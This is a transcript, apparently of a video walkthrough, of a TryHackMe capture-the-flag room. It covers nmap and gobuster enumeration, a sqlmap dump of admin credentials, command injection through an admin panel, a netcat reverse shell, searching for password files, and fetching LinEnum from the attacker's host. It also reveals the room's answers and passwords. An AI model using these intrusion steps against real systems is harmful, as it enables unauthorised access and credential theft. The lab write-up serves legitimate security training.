Hi guys, welcome back. So today we are going to solve one more system from TryHackMe portal, and this system name is the Code Keeper. This system to me is commented by one of the person in my YouTube video, so I thought of going through this particular system. It looks really nice. I just have gone through few of the challenges inside it, so which looks pretty good. So if you're new to this channel, then please go ahead and browse through the previous videos on TryHackMe, which I have posted already. So I just turned on this machine, I think 4 or 5 minutes back. So this is my IP address, target IP address I mean, and this is the expiry time. So let's go to the shell. So I have connected to the VPN now. So if I type ifconfig, okay, ifconfig, I can see that tune 0 is up now. So let's go ahead and start solving this system. So the first thing that we need to do is, okay, we have deployed it successfully. The next question is host enumeration. So again, it says like you can go for Nmap. So I have already made a video on Nmap, how to perform scan, where I have also included these things like -p-a. So let's go ahead and use this particular option to perform a scan. So it says like Nmap-p and it says 0 to 1000. Okay, so by default it's scan, but let's use 0 to 1000. It is provided. Used to specify the port analyze, can also use to specify a range of port, right? I have already made a video on Nmap, so you can go through, you will get an idea. So next we'll go for -sc. Okay, let's see, -sc. I usually like sv for verbose banner, so anyway I will use that. Also it says like -a for aggressive scan, so let's use -a and provide our target IP address, which I have already copied. So let me go ahead and paste it and hit enter. So it may take some time. Let's wait for the result. Meantime, let's go through the questions. So it says how many ports are open on the target machine. Next question is what is the HTTP title of the web server, what version of SSH service, and the fourth question is what is the version of web server. Okay, let's see what is the versions or details that we see. So the scan is completed. So if you could see here, it has port number 22 and 80 open, right? So how many ports are open? So the question is 2. I mean the answer is 2. Correct. Now what is the HTTP title of the web server? Let's go ahead and see. Okay, this is the title section, so this should be the answer. I hope they like it. Yeah, let's see. Okay, it works till this. I guess I have to copy and let me paste it. Correct, this is the correct answer. Next is what is version of SSH service. Okay, let's go to the SSH. So I'll copy from here and let me paste this. This is correct answer. Next is what is the version of the web server. Okay, so let's go ahead and see. So it says like HTTP header server header, so this should be the version, right? HTTP 2.4.18 Apache / this one. Let me go ahead and paste it. Yeah, this should be my correct flag. So we have just completed task 1, task 2, which is host enumeration. So what we did basically is we just perform an Nmap scan using different flag. So again, you can go to my Nmap videos, which I'll put in the above section, and you can watch this video on Nmap. Alright, let's move ahead. That is your web enumeration. So in web enumeration, they are recommending this tool GoBuster, so which is one of the very nice tool. You can also use Directory Buster, but let's go ahead and use this GoBuster. Again, the recommended word list they have also provided. Let me quickly download it. Let me simply run this, and this should download big.txt. If I type big.txt, yeah, this is my big.txt file. Alright, so let's move ahead to our next question, that is, or the answer is, what is the file of the important file on the server. So all we have to do is we have to use this GoBuster tool to basically provide this particular URL, which is running a web server, obviously. So if it is web server, if it is running web server, means we should be able to access via web browser. So you can see here, this is just the default Ubuntu page or Apache Ubuntu page. Okay, so let's go back and use this particular scanning command. So I'll simply copy this URL and let's say I will type GoBuster and then say -u which is for specifying the URL, which is this one. Then let's go ahead and see what is the tutorial there. So it says X to specify the file extension. Okay, wanna see all these files, so let's say I'm going to use this particular syntax here, whatever it is I have mentioned, -X, and I will say these files, and then I will say -W to provide my word list, so which is nothing but inside my downloads, then peak.txt, and then press enter. Okay, -U is not been acceptable. Okay, let me correct the syntax, that is directory. So we want to look out for the directory. Okay, so let's see what are the interesting output. So it says these files are 403. 403 means unauthorized or you cannot access directly. So let's wait for the whole scan to complete. This will take some time. So in between, let me talk about, like, whenever you find any web access, or let's say web browser port number 80 or 443 open, the first thing that I recommend as always is to open the URL inside the browser and see what is exactly there. It could be any WordPress website, Joomla website, or anything else, right? Next thing, I would also suggest you to go through and browse this robots.txt always. Sometimes that contains some of the juicy information, especially in case of the CTF stuff. Over here it is not allowed, so let's see, because the directory or GoBuster also has not detected it. Now another thing I also recommend you to is to go through the view source and see, like, if any sensitive information or if you see any interesting comment line or something, right? So over here it says some of the things which are pretty much default. Okay, always scroll through till down to see if any sensitive information or of any interesting information that you can see. Now this will take time, so I will just pause this video and let it run, and then we'll see. Oh nice, right here I can see this administrator.php which has 200. Okay, so let's go ahead and browse that without wasting time. Okay, so here is the administrator login page, and it's a typical login page. If I open the source, let's see if I can see something. No, this is just a login page. I don't think any more sensitive information here inside. So let's go back to the challenge answer. So it says what is the name of the important file on the server. So it should be administrator.php. So let me copy and paste it. Cool, I guess this would be correct answer. So we are able to solve task number 3. Now let's move further. So it says web exploitation. So the web page seems to give us a login form situation, like with always worth and check, low hanging fruits, form based SQL injection. Okay, so we have to perform a form based SQL injection here to see whether we can log into the application or not, right? So let me try manually first, and then we will see how we can do using different tool, that is our recommended tool, that is SQL map. Let's see if I type 1 colon or colon 1 colon 1, this should work. I mean, most of the time this thing work. Okay, says try again. Alright, no problem. Let's use SQL map to bypass it. It might take some time. I'm sure it will be vulnerable to SQL injection as indicated. So I might not able to get the answer in the first attempt. So I have to try a little bit, or try again as the challenge itself it says, right? So I see I have one hack box. Okay, let's close it. Over here, let's use the SQL map tool to make it more interesting, right? So I'll be simply using, there are multiple way to use this SQL map tool. SQL map, and then I will say -U and provide this URL. Okay, my bad, previous copy paste. Okay, and then I will say -form, since there are two forms are available, or form parameter, and then I will say simple one. Now there are multiple tons of options like tables and all those things, but -dump will dump all this information. Do you want this test this form? Yes, username, password. Exactly, this is what I want. Press enter. Edit the post data, warning detected, just fine. Go ahead. Do you want to fill the with random value? Yes. Alright, so after some time I can see the username is PINGUADAD, and secret password is secret pass. So few quick pro tips, I would say MySQL tool on testing website or CTF and all those stuff, but never ever run this tool on production website. Even that is advised in company or organization, but yeah, few people don't know, so they typically run it, and I have seen it. People running this tool and getting into trouble, so never ever run this particular tool. So let's go to this question answer. So what is the admin username? Okay, I hope this is the admin username, and yeah, this should be the admin username. Let me go ahead and submit it. Is correct. What is the admin password? Okay, this is the admin password. So you can also perform the SQL injection attack with like intercepting with Bob Suite and then sending it to one of the extension like SQL map API you can use for setting up, and then you can perform the scan done or SQL database dump. Now, how many form of the SQL is vulnerable to? Okay, you can see that the post parameter this and this, right? So let's go ahead and submit this answer. So if I go here and submit this as 3, this is the correct answer. Now we are done with task 4. Let's move further. So command injection is our next task. So it says it seems that we have gained ability to run command since this is my old PC. Okay, let's go ahead and log in with the credential that we have gathered just to get a confirmation the credentials are working fine. So let's go ahead and copy it, and let's go ahead and paste the password. This should be the admin page. So over here, this is the admin page where there is a command prompt. I guess this should be vulnerable to your command injection attack kind of. So if I type id and press enter, so you can see the id value for this particular www data user. Okay, that's cool. Let's go ahead and type ls. So this is the php file. This is administrator index.php. Okay, cool. So we can perform various command execution over here. Let's go to the question answer. So the question is how many files are in the current directory? Okay, so we know the answer, right? Because we just run the ls command. So 1, 2, 3 should be our answer. If the 3 doesn't work, either we can go for the 4. Okay, so this is my first answer. Now, do I still have an account? This is the next question. To do that, let's go ahead and get a shell like the reverse shell, and then we will probably see what we can do. Now to get a reverse shell, there are multiple way you can do it. So they have already provided some link like High on Coffee link, which is one of the pretty famous one, and also they provided Pentester Monkey link. So after this, you will have to do some additional enumeration to find ping, use, SSH key or hidden password. Alright, no problem. This machine has been outfitted with Netcat, a tool that allow you to make a reverse shell connection, all those things. So it is one of the most popular tools to get a reverse shell. So some great place to find are over here. So let's go ahead and use one of them. Probably I will start with using this basic bash script for the reverse shell. So let me create a simple listener over here just to listen the connection. So nc hyphen nlvp and 444, let's say I'm listening. Alright, let's go ahead and paste this answer. So I will not answer the query and hope this thing work. Let me quickly check the IP address and port. I hope those are in place. That's the most important part for this particular code. Okay, if I press enter and go back to my here, right here I can see my shell access. If I type id, now I can have the shell access kind of. Let's go ahead and try cat etc/psswd password file. So if I type one of the command from here, which is for listing out different directories, so we will use basically a find command to see like if we can find an interesting like SSH file or something, right? Already done multiple rule escalation, so this is pretty much easy for me. Otherwise you have to look out for all these commands from this particular blog, which is really interesting. I have referred multiple time in my past. That's why I also recommend this particular website to you. So if I go back right here, okay, so we're using find hyphen user pingu, okay, and then hyphen say hyphen print. Let's run this. Okay, so these are the files. There are some of the bash history, dot cache, and all those things. So let's run further some more command for any, if we can see any password backup or something like that, right? So password backup should be our, like the regex. So if I type find name, instead of user I am searching for name or a value which will be pass, and I'll just say star because I want to see the password value, which will be having this kind of pattern def/null. If I press enter, okay, so here you can see there's some of the interesting file, right? One of them is hidden pass, and also there is one like cron daily pass, initconf pass, and multiple other password file. All these files are sensitive file where you can see some, definitely find some interesting information. So let's go to this where, and then I will say hidden, okay, hidden, and if I see there should be this file. If I type pass, yeah, here you go, this is the let's say the password, I guess. So let me go ahead and copy and paste this particular value over here. This is what is my SSH password. This has to be the SSH password, and the answer seems to be yes. Do I still have an account? I think yes. It's pretty simple. I was unnecessarily moving around other thing. Okay, let's go ahead and go for task number 6. So it says Linux enum is a bash script that search for possible way privilege escalation. Yeah, Linenum is one of the great tool for performing privilege escalation and Linux. So they have actually suggested to use this scp command. You can also use simple Python server or HTTP server. Also, you can use the direct internet. So we'll see if we can use this like wget, if that thing work or not. So let's go ahead and go to this particular script directory. Let's go ahead and log into this system first using SSH, because we have now user ID and password. So if I type here SSH PINGU, right, at the rate my target IP address, which was nothing but this one, 10 10 202.89 10.10.202.89. It should ask me for the password. I guess yes. Okay, what is the password? The password is PING. Okay, I have a shell now. If I type ls, okay, that's fine. What I'm looking for is temp directory. So let's see if I go to this temp. Yeah, there in file there are some of the file, which is fine. Let's go ahead and wget our file. Sorry, my bad. I'll type wget and the URL. If I can download, sometime it allowed, sometime not. I guess over here we're still waiting. If it doesn't work, we have to start our own Python server and then start sending this particular file, right? So for doing that, I guess the simple way is to, let's download this particular file over here. Okay, and if you see this linsys SM file, this is the particular file, and if I type python -m simple http server, okay, it is starting on port number 8000. So let's go ahead and browse through that particular stuff. If that thing work, I will quickly jump to the system. Okay, that's fine, dude. I will also minimize this thing. So I'll say wget http:// and my IP address, which was my bad. I was having my IP address right here, 10.8.29.20. Okay, and :8000, and this particular file name is, so it's like linenum.sh. So make sure you provide the right name along with port number 8000. You see it is running on port number 8000 only. So .sh and press enter. This should be able to download this file. So over here we can see that linenum sh file is been downloaded. And now since this is an shell script, we need to provide. So you could see here, I think over here in Python log also you'll see this particular file has been sent. Okay, so let's go ahead and run this particular script. Now to do that, we need to provide some permission level. So let's say chmod plus x, and I'll say linenum.sh. Press enter. The permission has been granted. Now let's close this guy and interact with this particular terminal only. So all you have to do is run this particular script, and if I say linenum.sh, the script is running for enumerating all those details: super user account, this password file, admin user, right, and all those things. So one of the important thing is, once this particular script is completed execution, you have to basically browse through all these like files, whatever the output that it has generated. That's the most important and interesting part, right? So over here, I think let's go back to the question what it was there. Okay, let's add 1 hour. Question is, what is the interesting path of the interesting SUID file? So if you could go top, you will find SUID. I guess inside the root files, root directory only, there are some interesting files, or maybe there may be some interesting file 1 2 3 4. Yeah, it's the following same pattern. So either it can be answer this. So let's go ahead and submit this. Okay, this is the correct answer. So this way we have also seen how we can use Linenum script for Linux enumeration and submission. So this is part 1, guys. I think this is a pretty long video now. So next thing, or the next video will be on solving all these other 3 challenges. So hit like and subscribe. If you have any query, do write in the comment section, and I will definitely try to answer it.